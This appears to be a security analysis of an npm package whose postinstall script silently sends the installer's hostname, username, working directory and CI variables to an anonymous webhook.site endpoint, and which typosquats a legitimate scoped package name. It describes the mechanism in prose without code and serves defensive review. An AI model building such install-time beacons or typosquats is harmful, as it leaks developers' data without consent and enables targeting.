On npm install, postinstall.js runs unconditionally (scripts.postinstall = 'node postinstall.js') and sends an HTTPS GET to a hardcoded webhook.site URL carrying the installer's hostname (os.hostname()), username (os.userInfo().username), platform (os.platform()), current working directory (process.cwd()), and CI-detection environment variables (CI, BUILD_BUILDID, AGENT_NAME) as query parameters. webhook.site is an anonymous request-capture service — whoever holds the UUID receives identifying telemetry from every machine that installs this package, useful for follow-on targeting (CI build agent fingerprinting, developer host enumeration). Errors from the request are swallowed silently. The package additionally occupies the unscoped name getd-ui-library to mimic the legitimate scoped @getd/ui-library package; any developer who mistypes the install name receives this beacon. The package's own README framing this as 'defensive squat' research does not change the installer-side impact: host/user/cwd identifiers leave the machine on every install with no opt-in.